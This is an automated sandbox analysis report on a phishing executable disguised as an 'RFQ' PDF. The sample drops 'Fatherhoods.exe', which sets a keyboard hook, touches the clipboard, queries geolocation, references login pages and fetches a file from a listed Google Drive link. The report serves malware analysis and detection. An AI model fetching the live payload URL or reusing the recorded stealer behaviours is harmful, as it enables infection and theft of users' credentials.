            Source: qmgr.db.16.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.16.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.16.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.16.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.16.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.16.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.16.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2141588368.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp%
            Source: Fatherhoods.exe, 00000007.00000003.2149535851.0000000006178000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2263200825.000000000617D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2141588368.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588747870.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2145138136.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2260711822.000000000617D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2148288110.0000000006172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpC
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplr
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000007.00000000.1925625738.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000011.00000000.2150022717.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000012.00000000.2152159664.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000013.00000000.2154113588.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000014.00000000.2211751969.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000015.00000000.2214857913.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000016.00000000.2218115318.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, RFQ24060084#U00b7pdf.exe, Fatherhoods.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: RFQ24060084#U00b7pdf.exe, Fatherhoods.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000002.00000002.2117741495.0000000005586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2117741495.0000000005431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2117741495.0000000005586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000003.2225754789.000000000094D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000003.2225255453.000000000094D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: Fatherhoods.exe, 00000013.00000003.2164362005.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000013.00000003.2163981255.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000016.00000003.2225754789.000000000094D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000016.00000003.2225255453.000000000094D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
            Source: Fatherhoods.exe, 00000007.00000002.2602557067.0000000022BF0000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000013.00000002.2165469830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: Fatherhoods.exe, 00000007.00000002.2602557067.0000000022BF0000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000013.00000002.2165469830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: Fatherhoods.exe, 00000011.00000002.2230456263.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256856052.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.2117741495.0000000005431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.00000000060FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Y
            Source: Fatherhoods.exe, 00000007.00000002.2600973911.0000000021C80000.00000004.00001000.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.00000000060FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.00000000060FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj36
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006114000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.0000000006114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.000000000611B000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=download
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=downloadJ
            Source: Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=downloadT
            Source: Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=downloade
            Source: Fatherhoods.exe, 00000007.00000003.2109246580.0000000006114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/hQ
            Source: edb.log.16.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
            Source: svchost.exe, 00000010.00000003.2123201630.000001BFC1600000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.16.dr, edb.log.16.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
            Source: powershell.exe, 00000002.00000002.2117741495.0000000005586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?c
            Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.sL
            Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
            Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256602148.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?d
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257531283.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Fatherhoods.exe, 00000007.00000003.2074335170.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Fatherhoods.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: Fatherhoods.exe, 00000007.00000003.2074335170.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Fatherhoods.exe, 00000007.00000003.2074335170.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.10:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.10:49712 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Fatherhoods.exeJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_0040987A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_00406DFC
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_00406E9F
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_004068B5
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_004072B5
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004068B5
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,22_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fatherhoods.exe PID: 8112, type: MEMORYSTR

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: RFQ24060084#U00b7pdf.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_04475710 Sleep,NtProtectVirtualMemory,7_2_04475710
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004016FD NtdllDefWindowProc_A,18_2_004016FD
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004017B7 NtdllDefWindowProc_A,18_2_004017B7
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_00402CAC NtdllDefWindowProc_A,19_2_00402CAC
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_00402D66 NtdllDefWindowProc_A,19_2_00402D66
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_00402CAC NtdllDefWindowProc_A,22_2_00402CAC
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_00402D66 NtdllDefWindowProc_A,22_2_00402D66
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_00403348
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_004069450_2_00406945
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_0040711C0_2_0040711C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0368F0002_2_0368F000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0368F8D02_2_0368F8D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0368ECB82_2_0368ECB8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C3BC182_2_07C3BC18
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_004069457_2_00406945
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_0040711C7_2_0040711C
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2B5C17_2_22C2B5C1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C371947_2_22C37194
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044B04017_2_0044B040
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0043610D17_2_0043610D
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044731017_2_00447310
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044A49017_2_0044A490
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040755A17_2_0040755A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0043C56017_2_0043C560
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044B61017_2_0044B610
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044D6C017_2_0044D6C0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_004476F017_2_004476F0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044B87017_2_0044B870
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044081D17_2_0044081D
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0041495717_2_00414957
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_004079EE17_2_004079EE
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00407AEB17_2_00407AEB
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044AA8017_2_0044AA80
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00412AA917_2_00412AA9
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00404B7417_2_00404B74
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00404B0317_2_00404B03
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0044BBD817_2_0044BBD8
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00404BE517_2_00404BE5
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00404C7617_2_00404C76
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00415CFE17_2_00415CFE
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00416D7217_2_00416D72
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00446D3017_2_00446D30
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00446D8B17_2_00446D8B
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00406E8F17_2_00406E8F
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0040503818_2_00405038
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0041208C18_2_0041208C
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004050A918_2_004050A9
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0040511A18_2_0040511A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0043C13A18_2_0043C13A
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004051AB18_2_004051AB
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0044930018_2_00449300
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0040D32218_2_0040D322
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0044A4F018_2_0044A4F0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0043A5AB18_2_0043A5AB
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0041363118_2_00413631
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0044669018_2_00446690
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0044A73018_2_0044A730
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004398D818_2_004398D8
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004498E018_2_004498E0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0044A88618_2_0044A886
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0043DA0918_2_0043DA09
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_00438D5E18_2_00438D5E
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_00449ED018_2_00449ED0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0041FE8318_2_0041FE83
